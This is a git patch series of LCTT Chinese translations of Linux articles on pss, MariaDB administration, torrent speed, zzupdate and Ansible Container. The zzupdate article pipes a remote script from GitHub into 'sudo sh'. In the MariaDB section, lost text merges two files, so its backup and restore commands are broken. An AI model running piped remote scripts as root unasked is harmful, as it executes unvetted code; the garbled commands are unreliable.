deletions(-) delete mode 100644 sources/tech/20171222 Improve your code searching skills with pss.md create mode 100644 translated/tech/20171222 Improve your code searching skills with pss.md diff --git a/sources/tech/20171222 Improve your code searching skills with pss.md b/sources/tech/20171222 Improve your code searching skills with pss.md deleted file mode 100644 index d273287f15..0000000000 --- a/sources/tech/20171222 Improve your code searching skills with pss.md +++ /dev/null @@ -1,83 +0,0 @@ -translating by lujun9972 -Improve your code searching skills with pss -====== -Searching a code base is a part of every day developer activities. From fixing a bug, to learning a new code base or checking how to call an api, being able to quickly navigate your way into a code base is a great skill to have. Luckily, we have dedicated tools to search code. Let's see how to install and use one of them - [**pss**][1]. - -### What is pss? - -**pss** is a command line tool that helps searching inside source code file. **pss** searches recursively within a directory tree, knows which extensions and file names to search and which to ignore, automatically skips directories you wouldn't want to search in (for example `.svn` or `.git`), colors its output in a helpful way, and much more. - -### Installing pss - -Install **pss** on Fedora with the following command: -``` - $ dnf install pss -``` - -Once the installation is complete you can now call **pss** in your terminal -``` - $ pss -``` - -Calling **pss** without any argument or with the -h flag will print a detailed usage message. - -### Usage examples - -Now that you have installed **pss** let 's go through some Usage examples. -``` - $ pss foo -``` - -This command simply looks for `foo`. You can be more restrictive and ask pss to look for `foo` only in python files: -``` - $ pss foo --py -``` - -and for `bar` in all other files: -``` - $ pss bar --nopy -``` - -Additionally, **pss** supports most of the well known source file types, to get the full list execute: -``` -$ pss --help-types -``` - -You can also ignore some directories. Note that by default, **pss** will ignore directories like .git, __pycache__, .metadata and more. -``` -$ pss foo --py --ignore-dir=dist -``` - -Furthermore, **pss** also gives you the possibility to get more context from your search using the following : -``` -$ pss -A 5 foo -``` - -will display 5 line of context after the matching word -``` -$ pss -B 5 foo -``` - -will display 5 line of context before the matching word -``` -$ pss -C 5 foo -``` - -will display 5 line of context before & after the matching word - -If you would like to learn how to use **pss ** with regular expression and other options, more examples are available [here][2]. - - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/improve-code-searching-skills-pss/ - -作者:[Author Archive;Author Website;Clément Verna][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://fedoramagazine.org -[1]:https://github.com/eliben/pss -[2]:https://github.com/eliben/pss/wiki/Usage-samples diff --git a/translated/tech/20171222 Improve your code searching skills with pss.md b/translated/tech/20171222 Improve your code searching skills with pss.md new file mode 100644 index 0000000000..a03999c9bd --- /dev/null +++ b/translated/tech/20171222 Improve your code searching skills with pss.md @@ -0,0 +1,82 @@ +使用 pss 提升你的代码搜索能力 +====== +搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 api,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[**pss**][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 + +### 什么是 pss? + +**pss** 是一个帮你在源代码文件中进行搜索的命令行工具。**pss** 递归地在目录树中进行搜索,它能自动根据文件名和后缀判断哪些文件需要搜索,哪些文件不需搜索,并且会自动跳过那些你不会想搜索的目录(比如 `.svn` 和 `.git`),还能用色彩渲染输出以方便人们阅读,以及其他很多功能。 + +### 安装 pss + +使用下面命令在 Fedora 上安装 **pss**: +``` + $ dnf install pss +``` + +安装好后就能在终端调用 **pss** 了 +``` + $ pss +``` + +不带参数调用 **pss** 或者带上 `-h` 标志会输出详细的使用说明。 + +### 使用案例 + +现在你安装好 **pss** 了,下面来看一些例子吧。 +``` + $ pss foo +``` + +该命令只是简单的搜索 `foo`。你也可以限制 pss 让它只在 python 文件中搜索 `foo`: +``` + $ pss foo --py +``` + +还能在非 python 文件中搜索 `bar`: +``` + $ pss bar --nopy +``` + +而且,**pss** 支持大多数常见的源代码文件类型,要获取完整的支持列表,执行: +``` +$ pss --help-types +``` + +你还能指定忽略某些目录不进行搜索。默认情况下,**pss** 会忽略类似 `.git`,`__pycache__`,`.metadata` 等目录。 +``` +$ pss foo --py --ignore-dir=dist +``` + +此外,**pss** 还能显示搜索结果的上下文: +``` +$ pss -A 5 foo +``` +会现实匹配结果的后面 5 行内容 + +``` +$ pss -B 5 foo +``` + +会现实匹配结果的前面 5 行内容 +``` +$ pss -C 5 foo +``` + +会现实匹配结果的前后各 5 行内容 + +如果你想知道如何使用 **pss ** 进行正则表达式搜索以及它的其他选项的话,可以在[这里 ][2] 看到更多的例子。 + + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/improve-code-searching-skills-pss/ + +作者:[Author Archive;Author Website;Clément Verna][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org +[1]:https://github.com/eliben/pss +[2]:https://github.com/eliben/pss/wiki/Usage-samples From 1472cfb54fb81b74c0e744b264dbfd550dbafc1f Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 28 Dec 2017 11:03:05 +0800 Subject: [PATCH 0838/1627] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E9=85=8D=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171222 Improve your code searching skills with pss.md | 1 + 1 file changed, 1 insertion(+) diff --git a/translated/tech/20171222 Improve your code searching skills with pss.md b/translated/tech/20171222 Improve your code searching skills with pss.md index a03999c9bd..a9040bae77 100644 --- a/translated/tech/20171222 Improve your code searching skills with pss.md +++ b/translated/tech/20171222 Improve your code searching skills with pss.md @@ -1,5 +1,6 @@ 使用 pss 提升你的代码搜索能力 ====== +![](translate-MjAxNzEyMjIgSW1wcm92ZSB5b3VyIGNvZGUgc2VhcmNoaW5nIHNraWxscyB3aXRoIHBzcy5tZAo=) 搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 api,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[**pss**][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 ### 什么是 pss? From bd48c6716a5903c8a036656c8328552d31d5f21b Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 28 Dec 2017 11:04:58 +0800 Subject: [PATCH 0839/1627] fix url --- .../20171222 Improve your code searching skills with pss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171222 Improve your code searching skills with pss.md b/translated/tech/20171222 Improve your code searching skills with pss.md index a9040bae77..554342fa79 100644 --- a/translated/tech/20171222 Improve your code searching skills with pss.md +++ b/translated/tech/20171222 Improve your code searching skills with pss.md @@ -1,6 +1,6 @@ 使用 pss 提升你的代码搜索能力 ====== -![](translate-MjAxNzEyMjIgSW1wcm92ZSB5b3VyIGNvZGUgc2VhcmNoaW5nIHNraWxscyB3aXRoIHBzcy5tZAo=) +![](https://fedoramagazine.org/wp-content/uploads/2017/12/pss-945x400.jpg) 搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 api,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[**pss**][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 ### 什么是 pss? From 49b3ac95b7cc4ecef9efb38bedd360369f260190 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 28 Dec 2017 11:05:15 +0800 Subject: [PATCH 0840/1627] translate done: 20171222 Improve your code searching skills with pss.md --- .../20171222 Improve your code searching skills with pss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171222 Improve your code searching skills with pss.md b/translated/tech/20171222 Improve your code searching skills with pss.md index 554342fa79..3d4da18d6d 100644 --- a/translated/tech/20171222 Improve your code searching skills with pss.md +++ b/translated/tech/20171222 Improve your code searching skills with pss.md @@ -1,6 +1,6 @@ 使用 pss 提升你的代码搜索能力 ====== -![](https://fedoramagazine.org/wp-content/uploads/2017/12/pss-945x400.jpg) +![](https://fedoramagazine.org/wp-content/uploads/2017/12/pss-945x400.jpg) 搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 api,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[**pss**][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 ### 什么是 pss? From 1d75eeb291d0c921d3969f3d5b8ba57f155e84f9 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 28 Dec 2017 11:59:16 +0800 Subject: [PATCH 0841/1627] translate done: 20171202 MariaDB administration commands for beginners.md --- ...B administration commands for beginners.md | 174 ------------------ ...B administration commands for beginners.md | 171 +++++++++++++++++ 2 files changed, 171 insertions(+), 174 deletions(-) delete mode 100644 sources/tech/20171202 MariaDB administration commands for beginners.md create mode 100644 translated/tech/20171202 MariaDB administration commands for beginners.md diff --git a/sources/tech/20171202 MariaDB administration commands for beginners.md b/sources/tech/20171202 MariaDB administration commands for beginners.md deleted file mode 100644 index 65d8e91749..0000000000 --- a/sources/tech/20171202 MariaDB administration commands for beginners.md +++ /dev/null @@ -1,174 +0,0 @@ -translating by lujun9972 -MariaDB administration commands for beginners -====== -Earlier we have learned to [**install & secure MariaDB server on Centos/RHEL 7**][1], which is now the default database of RHEL/CentOS 7 onwards.We will now discuss some useful MariaDB administration commands. These are some very basic commands that will get you started with using MariaDB & these can also be used with MySQL, since Mariadb is forked out version of MySQL only. - -**(Recommended Read:[MongoDB installation & configuration on RHEL/CentOS][2])** - -## MariaDB Administration Commands - -### Checking version of your MariaDB installation - -To check the current version of your DB installation, type following command in your terminal - -``` -$ mysql -version -``` - -This command provide you with the current version of DB. Alternatively you can also run below mentioned command for detailed view on version, - -``` -$ mysqladmin -u root -p version -``` - -### Logging into mariadb - -To log into the mariadb server, run - -``` -$ mysql -u root -p -``` - -& then enter password to login to the session. - -### Showing all database - -To show all the databases that your maridb currently has, run - -``` -$ show databases; -``` - -after you are logged into mariadb. - -### Creating new databases - -To create a new database in mariadb, run - -``` -$ create database dan; -``` - -when logged into mariabdb. To create a database directly from terminal, run - -``` -$ mysqladmin -u user -p create dan -``` - -Here, **dan** is the name of the new database. - -### Deleting a database - -To delete a database, run - -``` -$ drop database dan; -``` - -from the logged in session of mariadb. Alternatively you can also use, - -``` -$ mysqladmin -u root -p drop dan -``` - -**Note:-** If you are getting an 'access denied' error while running the mysqladmin commands, that might be because we have not given rights to root. To do so, run the command mentioned in point 7, replacing name of the user with root. - -### Creating new user - -To create a new user for database, run - -``` -$ CREATE USER 'dan'@'localhost' IDENTIFIED BY 'password'; -``` - -### Granting access to user for a database - -For providing access to user for a single database, run - -``` -$ GRANT ALL PRIVILEGES ON test.* to 'dan'@'localhost'; -``` - -This will provide user dan complete access over database named test. We can also grant SELECT, INSERT , DELETE permissions to user. - -To provide access to all database, replace test with * i.e. - -``` -$ GRANT ALL PRIVILEGES ON *.* to 'dan'@'localhost'; -``` - -### Creating backup/dump of database - -To create of a single database, run the following command from your terminal window, - -``` -$ mysqldump -u root -p database_name>db_backup.sql -``` - -To create backup of multiple databases in single command, - -``` -$ mysqldump -u root -p - - databases db1 db2 > db12_backup.sql -``` - -To create dump of all databases in single command, - -``` -$ mysqldump -u root -p - - all-databases >all_dbs.sql -``` - -### Restoring database from the dump - -To restore database from a dump, run - -``` -$ mysql -u root -p database_namedb_backup.sql +``` + +若要一次性创建多个数据库的备份则运行, + +``` +$ mysqldump -u root -p - - databases db1 db2 > db12_backup.sql +``` + +要一次性导出多个数据库,则运行, + +``` +$ mysqldump -u root -p - - all-databases >all_dbs.sql +``` + +### 从备份中恢复数据库 + +要从备份中恢复数据库,运行 + +``` +$ mysql -u root -p database_name Date: Thu, 28 Dec 2017 16:18:19 +0800 Subject: [PATCH 0842/1627] translate done: 20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md --- ... Speed - Here Is Why It Will Never Work.md | 68 ------------------- ... Speed - Here Is Why It Will Never Work.md | 68 +++++++++++++++++++ 2 files changed, 68 insertions(+), 68 deletions(-) delete mode 100644 sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md create mode 100644 translated/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md diff --git a/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md b/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md deleted file mode 100644 index 55413f97aa..0000000000 --- a/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md +++ /dev/null @@ -1,68 +0,0 @@ -translating by lujun9972 -Increase Torrent Speed - Here Is Why It Will Never Work -====== - -Haven't we always wanted **better torrent speed**? No matter how much you have. You just can 't get enough of it. Our obsession with torrenting speed has often resulted in trying out those tricks from several websites including YouTube videos. And believe me, ever since I was a child till date I haven't found luck with it. So in this article, Let us have a look at why trying to increase torrent speed never works. - -## Factors that affect speed - -### Local Factors - -In the image below you can see that there are 3 computers with User A, B, and C. Now A and B are connected to each locally and C is somewhere far with multiple connection points 1,2 and 3 in between. - -[![][1]][2] - -If user A and B have to share files between them, they can directly do so without the need for torrents with the maximum speed available. This speed does not rely on the internet or anything. - - * The capacity of the wire - - * The capacity of network card of the devices - - * The capacity of the router - -I always see people talk about complicated stuff when it comes to torrenting but they always miss out on important factors. - -[![LAN wire, network cards, router][3]][3] - -Now we are talking about local file share, The usual network cards that people have in their newer devices are of 1 Gigabit. The common routers are around 300 Megabits and the wires can also mostly take 100 Megabits. Now you might be having a different setup but I am just giving a general example. - -Since you have a 1 Gigabit Network adapter, you believe that you should get 125 Megabytes in speed. But the router is only capable of only transferring a 300 Megabits which is 30 Megabyte. - -Even if you wanted to bargain at 30 Megabytes, The cable/link connecting you to the router is only capable of 100 megabits or 10 MegaBytes at best. This is a pure case of bottlenecking where one weak component affects the other stronger ones as transfers will happen with only 10 Megabytes which is the cable's limit. Now imagine a torrent which can be downloaded at extreme speed. But it is your weak hardware creating the bottleneck. - -### Foreign Factors - -Look at this image again. User C is somewhere far away. Probably in another country. **** - -[![how torrent works][1]][2] - -If this user created a torrent and you were to download it. The first problem would be the one we have already discussed. You wouldn 't be able to cross the 10 Megabyte mark. - -Secondly, since there are multiple points in between, maybe one of them could become the bottleneck again, it might have too much traffic and comparatively weaker hardware. Resulting in lower speed. - -### Seeders & Leechers - -There has already been too much discussion about it and the general idea is to have more seeders. I've also discussed seeders and leechers in [this article][4]. This is true, but keeping the above factor in mind, good seeders from a location that doesn't have a great link with mine is of no help at all. Usually, this doesn't happen most of the time as we are not the only ones downloading it and someone from our locality already has the file and is now seeding it. - -## Conclusion - -We tried to understand the reason behind our good or bad torrent speed. Irrespective of how many software tweaks we try, most of the times it is the physical barrier. I have usually never had any problems with the software and the default settings have worked for me. - -I hope you liked the article, Please feel free to pen down your thoughts in the comment section below. - - --------------------------------------------------------------------------------- - -via: http://www.theitstuff.com/increase-torrent-speed-will-never-work - -作者:[Rishabh Kandari][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.theitstuff.com/author/reevkandari -[1]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-550x275.png -[2]:http://www.theitstuff.com/wp-content/uploads/2017/11/A.png -[3]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-1-e1509773618549.png -[4]:http://www.linuxandubuntu.com/home/torrents-everything-you-need-to-know diff --git a/translated/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md b/translated/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md new file mode 100644 index 0000000000..127bb21066 --- /dev/null +++ b/translated/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md @@ -0,0 +1,68 @@ +Torrent 提速 - 为什么总是无济于事 +====== + +![](http://www.theitstuff.com/wp-content/uploads/2017/11/increase-torrent-speed.jpg) +是不是总是想要 **更快的 torrent 速度**?不管现在的速度有多块,但总是无法对此满足。我们对 torrent 速度的痴迷使我们经常从包括 YouTube 视频在内的许多网站上寻找并应用各种所谓的技巧。但是相信我,从小到大我就没发现哪个技巧有用过。因此本文我们就就来看看,为什么尝试提高 torrent 速度是行不通的。 + +## 影响速度的因素 + +### 本地因素 + +从下图中可以看到 3 台电脑分别对应的 A,B,C 三个用户。A 和 B 本地相连,而 C 的位置则比较远,它与本地之间有 1,2,3 三个连接点。 + +[![][1]][2] + +若用户 A 和用户 B 之间要分享文件,他们之间直接分享就能达到最大速度了而无需使用 torrent。这个速度跟互联网什么的都没有关系。 + ++ 网线的性能 + ++ 网卡的性能 + ++ 路由器的性能 + +当谈到 torrent 的时候,人们都是在说一些很复杂的东西,但是却总是不得要点。 + +[![LAN wire,network cards,router][3]][3] + +现在我们谈论的是本地文件分享,目前较新一点的网卡速率大约 1 Gigabit 左右。常见的路由器大约 300 Megabits 而网线大概能达到 100 Megabits。当然具体的配置可能不一样,我这里只是给一个一般性的例子。 + +由于你有一个 1 Gigabit 的网卡,你可能会觉得你的下载速度应该达到 125 Megabytes。但是路由器只允许传输 300 Megabits 也就是 30 Megabyte。 + +即使你把目标降到 30 Megabytes,然而你连接到路由器的电缆/网线的性能最多只有 100 megabits 也就是 10 MegaBytes。这是一个纯粹的瓶颈问题,由一个薄弱的环节影响到了其他强健部分,也就是说这个传输速率只能达到 10 Megabytes,即电缆的极限速度。现在想象有一个 torrent 即使能够用最大速度进行下载,那也会由于你的硬件不够强大而导致瓶颈。 + +### 外部因素 + +现在再来看一下这幅图。用户 C 在很遥远的某个地方。甚至可能在另一个国家。 + +[![how torrent works][1]][2] + +假设这个用户创建了一个 torrent 而你想去下载它。第一个问题就是我们刚才讨论过的,你不可能跨越 10 Megabyte 这道坎。 + +第二,由于 C 与本地之间多个有连接点,其中一个点就有可能成为瓶颈所在,可能由于繁重的流量和相对薄弱的硬件导致了缓慢的速度。 + +### Seeders( 译者注:做种者) 与 Leechers( 译者注:只下载不做种的人) + +关于此已经有了太多的讨论,总的想法就是搜索更多的种子,但要注意上面的那些因素,一个很好的种子提供者但是跟我之间的连接不好的话那也是无济于事的。通常,这不可能发生,因为我们也不是唯一下载这个资源的人,一般都会有一些在本地的人已经下载好了这个文件并已经在做种了。 + +## 结论 + +我们尝试搞清楚哪些因素影响了 torrent 速度的好坏。不管我们如何用软件进行优化,大多数时候是这是由于物理瓶颈导致的。我从来不关心那些软件,使用默认配置对我来说就够了。 + +希望你会喜欢这篇文章,有什么想法敬请留言。 + + +-------------------------------------------------------------------------------- + +via: http://www.theitstuff.com/increase-torrent-speed-will-never-work + +作者:[Rishabh Kandari][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-550x275.png +[2]:http://www.theitstuff.com/wp-content/uploads/2017/11/A.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-1-e1509773618549.png +[4]:http://www.linuxandubuntu.com/home/torrents-everything-you-need-to-know From 7ffdd87c53a978a897610be904f6f3224bb20ce8 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 28 Dec 2017 16:56:31 +0800 Subject: [PATCH 0843/1627] PRF&PUB:20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md @geekpi --- ... Newer Version with This Single Command.md | 49 +++++++++++-------- 1 file changed, 29 insertions(+), 20 deletions(-) rename {translated/tech => published}/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md (66%) diff --git a/translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md b/published/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md similarity index 66% rename from translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md rename to published/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md index dc853e1808..a87aae5879 100644 --- a/translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md +++ b/published/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md @@ -1,46 +1,48 @@ -使用一个命令轻松升级 Ubuntu 到较新的版本 +一行命令轻松升级 Ubuntu ====== + +![Upgrade Ubuntu to a newer version with a single command][3] + [zzupdate][1] 是一个开源的命令行程序,通过将几个更新命令组合到一个命令中,使得将 Ubuntu 桌面和服务器版本升级到更新版本的任务变得容易一些。 将 Ubuntu 系统升级到更新的版本并不是一项艰巨的任务。无论是使用 GUI 还是使用几个命令,都可以轻松地将系统升级到最新版本。 -另一方面,Gianluigi ‘Zane’ Zanettini 写的 zzupdate 只需一个命令就可以在 Ubuntu 中清理、更新、自动删除、版本升级、自我更新 composer。 +另一方面,Gianluigi 'Zane' Zanettini 写的 `zzupdate` 只需一个命令就可以在 Ubuntu 中清理、更新、自动删除、版本升级、该工具自我更新。 -它清理本地缓存,更新可用的软件包信息,然后执行发行版升级。在下一步中,它会更新 Composer 并删除未使用的软件包。 +它会清理本地缓存,更新可用的软件包信息,然后执行发行版升级。接着,它会更新该工具并删除未使用的软件包。 -脚本必须以root用户身份运行。 +该脚本必须以 root 用户身份运行。 ### 安装 zzupdate 将 Ubuntu 升级到更新的版本 -![Upgrade Ubuntu to a newer version with a single command][2] +要安装 `zzupdate`,请在终端中执行以下命令。 -![Upgrade Ubuntu to a newer version with a single command][3] - -要安装 zzupdate,请在终端中执行以下命令。 ``` curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh ``` -然后将提供的示例配置文件复制到 zzupdate.conf 并设置你的首选项。 +然后将提供的示例配置文件复制到 `zzupdate.conf` 并设置你的首选项。 + ``` sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf ``` 完成后,只要使用下面的命令,它就会开始升级你的 Ubuntu 系统到一个更新的版本(如果有的话)。 -`sudo zzupdate` +``` +sudo zzupdate +``` -请注意,在普通版本下,zzupdate 会将系统升级到下一个可用的版本。但是,当你运行 Ubuntu 16.04 LTS 时,它将尝试仅搜索下一个长期支持版本,而不是可用的最新版本。 +请注意,在普通版本(非 LTS 版本)下,zzupdate 会将系统升级到下一个可用的版本。但是,当你运行 Ubuntu 16.04 LTS 时,它将尝试仅搜索下一个长期支持版本,而不是可用的最新版本。 如果你想退出 LTS 版本并升级到最新版本,你将需要更改一些选项。 对于 Ubuntu 桌面,打开 **软件和更新** 和下面 **更新** 选项卡,并更改通知我新的 Ubuntu 版本选项为 “**对于任何新版本**”。 -![Software Updater in Ubuntu][2] - ![Software Updater in Ubuntu][4] -对于 Ubuntu 服务版,编辑版本升级文件。 +对于 Ubuntu 服务版,编辑 `release-upgrades` 文件。 + ``` vi /etc/update-manager/release-upgrades @@ -49,39 +51,46 @@ Prompt=normal ### 配置 zzupdate [可选] -zzupdate 要配置的选项 +`zzupdate` 要配置的选项: + ``` REBOOT=1 ``` 如果值为 1,升级后系统将重启。 + ``` REBOOT_TIMEOUT=15 ``` 将重启超时设置为 900 秒,因为某些硬件比其他硬件重启需要更长的时间。 + ``` VERSION_UPGRADE=1 ``` 如果升级可用,则执行版本升级。 + ``` VERSION_UPGRADE_SILENT=0 ``` -自动显示版本进度 +自动显示版本进度。 + ``` COMPOSER_UPGRADE=1 ``` -值为 “1” 会自动升级 composer。 +值为 “1” 会自动升级该工具。 + ``` SWITCH_PROMPT_TO_NORMAL=0 ``` -此功能将 Ubuntu 版本更新为普通版本,即如果你运行着 LTS 发行版,zzupdate 将不会将其升级到 Ubuntu 17.10(如果其设置为 0)。它将仅搜索 LTS 版本。相比之下,无论你运行着 LTS 或者普通版,“1” 都将搜索最新版本。 +此功能将 Ubuntu 版本更新为普通版本,即如果你运行着 LTS 发行版,`zzupdate` 将不会将其升级到 Ubuntu 17.10(如果其设置为 0)。它将仅搜索 LTS 版本。相比之下,无论你运行着 LTS 或者普通版,“1” 都将搜索最新版本。 完成后,你要做的就是在控制台中运行一个完整的 Ubuntu 系统更新。 + ``` sudo zzupdate ``` @@ -96,9 +105,9 @@ sudo zzupdate via: https://itsfoss.com/zzupdate-upgrade-ubuntu/ -作者:[Ambarish Kumar;Abhishek Prakash][a] +作者:[Ambarish Kumar][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 22693e440eb45f65b68988226c4949094a79b36f Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 28 Dec 2017 18:17:43 +0800 Subject: [PATCH 0844/1627] PRF:20171005 How to manage Linux containers with Ansible Container.md @qhwdw --- ...Linux containers with Ansible Container.md | 61 ++++++++----------- 1 file changed, 24 insertions(+), 37 deletions(-) diff --git a/translated/tech/20171005 How to manage Linux containers with Ansible Container.md b/translated/tech/20171005 How to manage Linux containers with Ansible Container.md index 624d25694a..63918aec5a 100644 --- a/translated/tech/20171005 How to manage Linux containers with Ansible Container.md +++ b/translated/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -1,44 +1,35 @@ -怎么去使用 Ansible Container 去管理 Linux 容器 +用 Ansible Container 去管理 Linux 容器 ============================================================ -### Ansible Container 处理 Dockerfile 的不足和对容器化项目提供完整的管理。 +> Ansible Container 解决了 Dockerfile 的不足,并对容器化项目提供了完整的管理。 ![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") + Image by : opensource.com -我喜欢容器,并且每天都使用这个技术。在过去几个月,在一组项目中已经解决了我遇到的问题,即便如此,容器并不完美。 +我喜欢容器,并且每天都使用这个技术。即便如此,容器并不完美。不过,在过去几个月里,一系列项目已经解决了我遇到的一些问题。 -我刚开始时,用 [Docker][11] 使用容器,因为这个项目使这个技术非常流行。除此之外,使用这个容器引擎,我学到了怎么去使用 **[docker-compose][6]** 以及怎么去用它管理我的项目。使用它使我的生产力猛增!一个命令去运行我的项目,而不管它有多复杂。因此,我太高兴了。 +我刚开始时,用 [Docker][11] 使用容器,这个项目使得这种技术非常流行。除了使用这个容器引擎之外,我学到了怎么去使用 [docker-compose][6] 以及怎么去用它管理我的项目。使用它使得我的生产力猛增!一个命令就可以运行我的项目,而不管它有多复杂。因此,我太高兴了。 -使用一段时间之后,我发现了一些问题。最明显的问题是创建窗口镜像的过程。Docker 工具使用一个定制的文件格式作为一个 Recipe 去制作容器镜像 — Dockerfiles。这个格式很容易学会,并且很短的一段时间之后,你就可以为你自己制作容器镜像了。但是,一旦你希望去掌握最佳实践或者有复杂场景的想法,问题就会出现。 +使用一段时间之后,我发现了一些问题。最明显的问题是创建容器镜像的过程。Docker 工具使用一个定制的文件格式作为生成容器镜像的依据:Dockerfile。这个格式易于学习,并且很短的一段时间之后,你就可以自己制作容器镜像了。但是,一旦你希望进一步掌握它或者考虑到复杂场景,问题就会出现。 -Ansible 的更多资源 +让我们打断一下,先去了解一个不同的东西:[Ansible][22] 的世界。你知道它吗?它棒极了,是吗?你不这么认为?好吧,是时候去学习一些新事物了。Ansible 是一个允许你通过写一些任务去管理你的基础设施,并在你选择的环境中运行它们的项目。不需要去安装和设置任何的服务;你可以从你的笔记本电脑中很容易地做任何事情。许多人已经接受 Ansible 了。 -* [Ansible 是怎么工作的][1] +想像一下这样的场景:你在 Ansible 中,你写了很多的 Ansible 角色role剧本playbook,你可以用它们去管理你的基础设施,并且你想把它们运用到容器中。你应该怎么做?通过 shell 脚本和 Dockerfile 去写容器镜像定义?听起来好像不对。 -* [免费的 Ansible 电子书][2] +来自 Ansible 开发团队的一些人问到这个问题,并且他们意识到,人们每天编写和使用的那些同样的 Ansible 角色和剧本也可以用来制作容器镜像。但是 Ansible 能做到的不止这些 —— 它可以被用于去管理容器化项目的完整生命周期。从这些想法中,[Ansible Container][12] 项目诞生了。它利用已有的 Ansible 角色转变成容器镜像,甚至还可以被用于生产环境中从构建到部署的完整生命周期。 -* [Ansible 快速上手视频][3] +现在让我们讨论一下,我之前提到过的在 Dockerfile 环境中的最佳实践问题。这里有一个警告:这将是非常具体且技术性的。出现最多的三个问题有: -* [下载和安装 Ansible][4] +### 1、 在 Dockerfile 中内嵌的 Shell 脚本 -让我们先休息一会儿,先去了解一个不同的东西:[Ansible][22] 的世界。你知道它吗?它棒极了,是吗?你不这么认为?好吧,是时候去学习一些新事物了。Ansible 是一个项目,它允许你通过写一些任务去管理你的基础设施,并在你选择的环境中运行它们。不需要去安装和设置任何的服务;你可以从你的笔记本电脑中去很很容易地做任何事情。许多人已经接受 Ansible 了。 - -想像一下这样的场景:你在 Ansible 中,你写了很多的 Ansible 角色和 playbooks,你可以用它们去管理你的基础设施,并且想把它们运用到容器中。你应该怎么做?开始通过 shell 脚本和 Dockerfiles 去写容器镜像定义?听起来好像不对。 - -来自 Ansible 开发团队的一些人问到这个问题,并且它们意识到,人们每天使用那些同样的 Ansible 角色和 playbooks 也可以用来制作容器镜像。但是 Ansible 能做到的不止这些 — 它可以被用于去管理容器化项目的完整的生命周期。从这些想法中,[Ansible Container][12] 项目诞生了。它使用已有的可以变成容器镜像的 Ansible 角色,甚至可以被用于应用程序在生产系统中从构建到部署的完整生命周期。 - -现在让我们讨论一下,在 Dockerfiles 